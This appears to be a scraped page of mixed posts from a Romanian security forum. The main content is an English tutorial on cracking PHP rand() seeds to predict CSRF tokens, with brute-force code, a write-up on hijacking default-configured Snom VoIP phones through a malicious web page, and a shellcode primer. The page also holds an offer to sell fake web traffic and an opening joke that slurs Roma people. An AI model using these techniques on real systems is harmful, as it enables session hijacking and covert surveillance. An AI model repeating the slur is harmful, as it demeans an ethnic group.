Leaderboard

Daca gasiti un tigan injunghiat in spate, sa stiti de la mine ca e vorba doar de un alt caz de sinucidere! :)))))

Webapps occasionaly need to create tokens that are hard to guess. For example for session tokens or CSRF tokens, or in forgot password functionality where you get a token mailed to reset your password. These tokens should be cryptographically secure, but are often made by calling rand() multiple times and transforming the output to a string. This post will explore how hard it is to predict a token made with rand(). How rand works In PHP, the function rand() creates pseudorandom numbers. The initial state of the random number generator (the seed) is set with srand. If you don’t call srand yourself, PHP seeds the random number generator with some hard to guess number when you call rand. The seed passed to srand totally determines the string of numbers that rand will generate. The random number generator keeps a state that is initially set by srand and then changed every time you call rand. This state is specific to the process, so two processes typically return different numbers for rand. On Windows this state has a size of 32 bits and can be directly set using srand. On Linux the state is 1024 bits. Our example program Our example program is EZChatter, a small toy program put together in a day. It does use CSRF tokens, but does not a very good job at creating them securily: public static function gen($len = 5) { $token = ''; while($len--){ $choose = rand(0, 2); if ($choose === 0) $token .= chr(rand(ord('A'), ord('Z'))); else if($choose === 1) $token .= chr(rand(ord('a'), ord('z'))); else $token .= chr(rand(ord('0'), ord('9'))); } return $token; } As you can see it first calls rand to determine whether to use an uppercase letter, lowercase letter or number, and then again to pick a specific letter or number. Every time we request the index.php page we get a new CSRF token, so we can request as many as we want. Our job is to predict tokens that have been handed out to other users, so we can do a CSRF attack on them. Seed cracking As we said the random number series is totally defined by the seed, so we can simply try every possible number as argument for srand to get the random number generator in the right state. Note that on Linux this will only work if the server process is fresh. If the server process has already seen a lot of rand calls, we need to do the same amount in our cracking program to get the same state. On Windows, the state of the random number generator is the same as the argument to srand, so you don’t need a fresh process. If we got a token from a fresh process, the following PHP script can be used to crack it: for ($i = 0; $i < PHP_INT_MAX; $i++) { srand($i); if (Token::gen(10) == "2118Jx9w3e") { die("Found: $i \n"); } } To search the 4294967295 possible arguments to srand, this will take approximately 12 hours. However, since PHP just calls the glibc rand function, we can reimplement the PHP code as C and speed things up. I have made two versions, one that calls the glibc rand and one that mimics the Windows rand. It is basically the PHP code from token.php, a copy paste of some macro’s from PHP’s ext/standard/rand.c, and a loop to go through every possible seed. This will take about 10 minutes for the Windows version and a couple of hours for the Linux version. Once completed, you have the random number generator in the same state and you can keep generating the same tokens as on the server. By comparing your own generated tokens with the tokens the server returns you know which tokens have been handed out to other users, and you can start your attack. State cracking on Linux On Windows, cracking the argument to srand and cracking the state of the random number generator turn out to be the same thing, but on Linux they are different. The glibc rand() keeps a series of numbers, and determines the next state like this: state = state[i-3] + state[i-31] return state >> 1 So every output is approximately the summed output from 3 and 31 calls ago. Consider the following series of tokens: 6ZF5kNgonV 9h3byovpGR gGt0A94U92 Now, the next rand will be determining whether it will be an uppercase letter, lowercase letter or number. This is determined by the outcomes of rand 3 and 31 calls ago. That’s the last 9 in gGt0A94U92 and the y in 9h3byovpGR. So we expect the next output of rand(0, 2) to be approximately ⌊10/10 + 25/26 × 3⌋ = 2 mod 3, so that means we get a number. Let’s see if we can predict that number. The next calls to rand that determines the number is determined by the rand from 3 calls ago, a number, and the rand of 31 calls ago, a lowercase letter. The number will thus be between ⌊2/3 + 1/3 × 10⌋ = 0 mod 10 and ⌊3/3 + 2/3 × 10⌋ = 6 mod 10. We thus expect the number to be between 0 and 6. It turns out to be 4: 43J2d2ew31 As you can see we can not accurately predict the next token using this method, but it is also clear that the we can predict so much about it that you can hardly call it random. It may also be possible to crack the whole state of the glibc random number generator given enough tokens, although I have not tried this. Conclusion Tokens should be created using a cryptographically secure random number generator. If they are made with rand, the state of the random number generator can be cracked trivially in many cases, and tokens can be predicted. On Linux it is a little bit harder to predict tokens, but this does still not give secure tokens. The random number generator on Windows is particularly easy to exploit, since any state of the random number generator can be cracked within minutes. Sursa

Malwarebytes Anti-Ransomware uses advanced proactive technology that monitors what ransomware is doing and stops it cold before it even touches your files. It has no shot at encrypting. And it does not rely on signatures or heuristics, so it’s light and completely compatible with antivirus. These methods proved to be so successful at stopping ransomware that Malwarebytes Anti-Ransomware detected all of the latest and most dangerous ransomware variants right out of development and into beta 1. This means when running Malwarebytes Anti-Ransomware, you do not have to worry about getting infected by CryptoLocker, CryptoWall, or CTBLocker. Better yet, it can defeat new ransomware the moment it is released, proactively protecting you from ransomware that’s never even been seen before. Malwarebytes Anti-Ransomware open beta starts today and is available for anyone to install and try out. Please keep in mind that this is the first beta and there may be some bugs or issues that need to be worked out, so we encourage you to try it out in a non-production environment first. Download Beta https://malwarebytes.box.com/s/uluqe6ms2l36bsxkudurlr7yr8lp6d8g

Salut, Am mai discutat acest subiect, cred ca unele topicuri s-au pierdut din pacate, dar update-ul forumului este de bun augur, articole se pot scrie oricand. Pentru cei care mi-ati scris in ultima vreme aici, pe skype, facebook etc, incerc sa va raspund aici, forumul fiind public, poate ii ajuta si pe altii. Nu o sa reiau ce fac si cum fac, o sa incerc sa raspund la cateva intrebari. 1) Ai nevoie de firma pentru a incepe un business in dropshipping ? Daca vrei sa fie o chestie serioasa, iti recomand sa iti faci una, la inceput nu o sa iti trebuiasca, dar cu timpul o sa tranzactionezi din ce in ce mai multi bani si o sa ai nevoie de o firma, paypalul o sa puna intrebari si o sa devina stresant. 2) De ce cunostinte ai nevoie ? De utilizare a calculatorului si de limba engleza medie. E nevoie intradevar de un magazin online dar se gasesc 100000+ tutoriale nu iti trebuie cunostinte, sau poti folosi shopify ! 3) De unde iau produsele ? De oriunde ! Asta daca nu detii o companie. Daca ai o companie, ceea ce iti si recomand, suplieri se gasesc : sunt marketuri pentru asa ceva, un exemplu este Doba. Daca nu ai firma si totusi cauti un suplier, poti arunca un ochi aici : http://www.blackhatworld.com/blackhat-seo/f68-dropshipping-wholesale-hookups/ 4) Cat timp iti trebuie, eu am si servici..si... Si eu, da si eu am un job, intradevar e mai lejer dar am un program de 8 ore si totusi reusesc cumva sa ma ocup si de droipshipping. Prefer sa am si un job dar sa muncesc si la afacerea mea, pana strang destuii bani sa investesc in ceva mai bun, sau sa extind deja ceea ce am. 5) Am site, am tot planificat dar nu am cui sa vand ! Metoda cu bani + rapida : Dai bani ca sa faci bani ! = Facebook Ads, Google Adwords, campanii SEO. Metoda fara bani : pagini in social media -> distribuirea in toate grupurile din nisa ta + grupurile de tip "Buy & Sell", follow 4 follow, pin, etc...depinde de retea. Seo -> cred ca poti optimiza tu paginile fara ajutorul cuiva, sunt mult prea multe informatii pe internet, apoi poti incepe pasiv sa iti creezi si backlinkuri, semnale sociale, etc. 6) Ce sisteme de plati folosesti ?! Inainte de a avea firma foloseam doar paypal, pentru ca ofera celor care nu au un cont sa plateasca si cu cardul, acum am o firma si am integrate mai toate sistemele : Cu cardul, paypal, western etc. 7) Cat sa cresc pretul produselor ?! Formula mea : PRETUL PRODUSULUI + PRETUL CELUI MAI RAPID SHIPPING + 20 - 40 % - asta depinde si de valoarea produsului. 8) Ce fac daca cineva imi cere date de contact ?! Ai crescut in pestera ? Sau deh poate esti mut, atunci te inteleg, daca nu se aplice acestea, te duci frumos pe skype, iti cumperi un nr de telefon de la ei, il redirectezi catre nr tau de telefon si vorbesti cu oameni. 9) Ce fac daca nu stiu engleza ?! Pas ! 10) Cat profit faci si cat de repede ai inceput sa castigi bani ? Fac destul altfel nu ma tineam de business si nu imi faceam o companie pentru aceste lucruri. Cat de repede? Eu din prima zi pentru ca aveam cateva conturi de social media deja setate pentru aceste lucruri. 11) Poti sa imi dai un link cu siteurile tale si / sau paginile tale ?! NU. Acestea sunt cele mai comune intrebari care le primesc, dropshippingul e in ochii tuturor, nu e secret, toti il puteti face, asta ca sa nu mai spuneti ca nu se pot face bani pe internet! Cum spunea un bun prieten al meu ": Bani adevarati pe internet se fac din intermediere de servicii....ala are produsul, tu il vinzi, punct. Numai Bine si spor la bani !

Ma, ideea e ca banuiesc ca in toata viata ta ai dat si tu o comanda online. Si cred ca stii ca nu prea ai cum sa ridici coletul daca n-ai cum sa raspunzi curierului la telefon. Adica e ceva intuitiv pentru o comanda. Bafta.

Verdict: crima. Motiv: - se poate observa biletul pe care aparent suntem toti tentati sa credem ca l-a scris victima. Un mic amanunt: lampa, aparent pozitionata spre bilet, nu este bagata in priza => cineva s-a grabit sa faca sa para ca si cum victima a avut nevoie de lumina pentru a scrie biletul. Mai mult, de ce ti-ai lua o doza de Cola si te-ai sinucide inainte sa o bei? D'ohh Scaunul acela rasturnat nu prea isi are locul in peisaj: - daca victima statea pe scaun cand se impusca in bostan, pata de sange nu putea sa fie asa densa (cea de pe perete) - daca victima se impusca in dreptul peretelui, judecand dupa proportille din imagine, nu avea cum sa rastoarne scaunul. Cartea visinie din dreapta sus pare putin nelalocul ei (cineva a cautat ceva). Deci: care esti ma ? ce-ai avut cu saracu' om ? @Byte-ul tu esti

A few weeks ago, I was asked to observe an installation of several wireless access points & VoIP phones, with a view to making recommendations on how best to improve security while maintaining ease of deployment. It didn't take long for several trends to appear; chief amongst which was the use of Of course, as soon as the device burst into life, it's on to the next one. At which point, "now" becomes a distant memory, along with any thoughts of hardening the device for use in a commercial setting. This was not a fly-by-night company either, nor do they install cheap & cheerful hardware; we're fitting enterprise-grade Cisco, Snom & Ubiquiti UniFi equipment. With a tight schedule & reputable brand names, I completely understand why many installers trust the default configurations so vehemently. A default config is rarely a secure config. A default configuration is only intended to restore a device to a "default" state, such that a competent installer can configure it to meet the client's needs. Note: This is neither aimed at nor unique to Snom devices. I'm aware of similar exploits against current Cisco devices too. In the following example, I've reset a Snom 320 VoIP phone (running 8.7.5.13 firmware) back to factory "default" settings. Even before we begin, there's a serious problem... there's no authentication whatsoever! To their credit, some manufacturers provide a default set of credentials... even if they're usually "admin/admin", thus equally insecure. Snom however, opted to place a tiny "HTTP password not set" warning at the top of the configuration screen. That'd be fine if it forced you to set a password during the setup process, but it doesn't. To make matters worse, it's only too happy to accept a single character/number password too. A reasonable argument, you might think. So, let's put it to the test. Hijacking the Snom 320 Step 1: Visit a site which contains the exploit payload. That's it. Simply by opening a malicious site (or a genuine site containing the malicious payload), the attacker has complete control over our VoIP phone. To demonstrate this vulnerability, I enlisted the help of two colleagues... Per Thorsheim & Scott Helme. Per will play the part of our attacker, embedding the exploit on a site which he controls. Meanwhile, I'm reading Per's site while having a private conversation with Scott, via Skype. Unbeknownst to me, Per has forced my VoIP phone to call his premium rate number and disabled the speaker, so unless I'm looking at the phone, I wouldn't know it's dialling. Note: We've left the activity LED on during this demo, as it's difficult to read the screen. When the light illuminates, the phone is dialling out. What can the attacker do? Virtually anything. Make calls, receive calls, transfer calls (even before it rings), play recordings, upload new firmware and crucially... use the device for covert surveillance. Our self-defeating approach... If we look beyond the IP telephony sector to the industry as a whole, many companies ship devices which have no "default" security... or permit the use of weak credentials which provide nothing more than a false sense of security. It has to stop. Vendors - If you must supply devices with "default" credentials, disable all other functionality until a suitably-secure password is set to replace it. The term "covert surveillance" is usually only associated with nation states, certain 3-letter agencies and those closed-minded individuals pushing the Investigatory Powers Bill (IPBill / Snoopers Charter). In this demonstration, the attacker has not only compromised your phone & privacy with just a browser, but you've paid him for the privilege! If you install, use or just find yourself sat next to one of these devices, just remember... it's basically a PC, with all the security vulnerabilities associated with them. Don't assume it's safe because it's running as the manufacturer intended; seek professional advice. 1) Use strong passwords, derived from a password manager. 2) VLAN / network segregate your phones, if possible. 3) Restrict access to APIs, even if they're only visible internally. 4) Check & upgrade your firmware regularly, ensuring it doesn't revert to "defaults" afterwards. Just today, Professor Alan Woodward of Surrey University published an article entitled "Are you the only one using your VOIP phone?" which discusses the various attack vectors & implications associated with VoIP devices. If you haven't yet subscribed to Alan's RSS feed, I'd strongly suggest doing so. Thanks to Per Thorsheim & Scott Helme for their help with this demonstration. That's it folks... for now. SOURCE - https://paul.reviews/pwnphone-default-passwords-allow-covert-surveillance/

poti incerca hitleap.com pare perfect pt ce ai tu nevoie, eventual eu am un cont de pe care iti pot oferi vreo 200k hits/10 sec. eu nu il folosesc deci ma multumesc cu cativa euro

Introduction to Windows shellcode development – Part 3 February 15, 2016 Ionut Popescu If you missed the first two parts of this article, you can find in Part I what is a shellcode, how it works and which are its limitations and in Part II you can read about the PEB (Process Environment Block) structure, the PE (.exe, .dll) file format and you can go through a short ASM introduction. You’ll need this information in order to properly understand Windows shellcodes. In this last part of the shellcode development introduction, we will write a simple “SwapMouseButton” shellcode, a shellcode that will swap left and right mouse buttons. We will start from an existing shellcode: “Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode“. The shellcode name tells us a few things, such like it uses: URLDownloadToFile Windows API function to download a file WinExec to execute the file (executable file: .exe) ExitProcess will terminate the process running the shellcode Using this example, we will call SwapMouseButton function and ExitProcess function. I’m pretty sure it is easy to understand what these functions do. BOOL WINAPI SwapMouseButton( _In_ BOOL fSwap ); VOID WINAPI ExitProcess( _In_ UINT uExitCode ); As you can see, each function has only one parameter: fSwap parameter can be TRUE or FALSE. If it is TRUE, the mouse buttons are swapped, else they are restored. uExitCode represents the process exit code. Each process must return a value on exit (zero if everything was ok, any other value otherwise). This is the “return 0” of the main function. Link: http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/

A trecut cineva de random()?

Hartia aia a tigarilor e facuta special pentru a inhiba focul, astfel incat sa se stinga singure dupa un anumit timp pentru a evita incendii. https://en.wikipedia.org/wiki/Fire_safe_cigarette

si care sunt produsele e strict secret, este? si voi stiti sa vindeti la fel cum beau rusii apa

@Maximus are un program de vanzare.

Si inca o buba ar fi ca cei de la clickbank au o rata foarte mare de refund ce te faci daca din 2000 de facturi 500 sunt refund? Te ia durerea de cap.

Va rog sa nu incepeti cu telenovelele. Tema nu e singurul lucru pe care l-am schimbat la forum. O sa incercam sa-l tinem mai curat asa ca incetati cu flame-ul si offtopicul. Exemplu: @AGSQ, @ManutaDeAur, @Kronzy si @Meteosensibilul Ati fost cam offtopic in ultimele raspunsuri. Sistemul de report e foarte fain aici asa ca daca cineva "sare gardu" folositi-l cu incredere in loc sa raspundeti in thread si sa stricati topicul original. #numazic

Free Trial Details When you join Perfect Audience, the first Facebook or web retargeting campaign you launch will be completely free for 2 weeks after it launches or until it reaches $100 in spend. You'll receive an e-mail 2 days before your campaign's free trial expires to let you know. If your campaign is still active at the end of the trial period, we will automatically switch it from free trial mode to full mode and bill you for the current pay period's budget. This ensures continuity of ad serving. Advertisers are limited to one free trial campaign, which can be launched as soon as your site's 'All Visitors' Retargeting Audience has cookied 250 visitors in a 7 day period. Mobile, Web & Facebook Retargeting Made Simple | Perfect Audience campania mea a fost activata in cateva ore.

Pentru a se incarca, acumulatorii au nevoie de tensiune mai mare ca cea nominala. Care este exact diferenta nu as putea sa spun. De obicei telefoanele (cel putin cele care se pot incarca de la surse USB) ori sunt construite sa se incarce de la 5V ori au in interior chip-uri de reglare a tensiunii.

Daca incarcatorul original are 5V e ok.

Telefonul o sa "traga" cat curent ii trebuie. E ok daca ii dai si 10 amperi. Voltajul trebuie sa fie acelasi.

eu cred ca gagica asta , a primit plicul la sfarsit de an fiscal de la taxe si impozite, sa asejat confortabil pe scaun la o tigare , si-a desfacut o doza de cola nu avea JB a indemana, iar cand a vazut cat are de plata , ti-a pus pistolu in gura , si a ales calea cea mai usoara , de ce sa traiasca in romania , cand poate sa fir fericita in cealanta lume.

[part 1]Some basic Linux commands Hello guys Today, we just started a new series on Linux commands. It's gonna be a fun Tutorial link:: so keep watching Pentesting with spirit Please Subscribe my channel to get the notification for the upcomming tutorials , and please like & share too :cool: Sharing is power :blackhat: and please comment if i have done anything wrong ----------------------------------------------------------------------------------------------------------- Subscribe our channel:: www.youtube.com/c/Pentestingwithspirit Like our facebook page:: www.facebook.com/Pentest.with.spirit1 Follow us on twitter:: @spirit3113

Ai putea sa mergi si sa Neo1337nude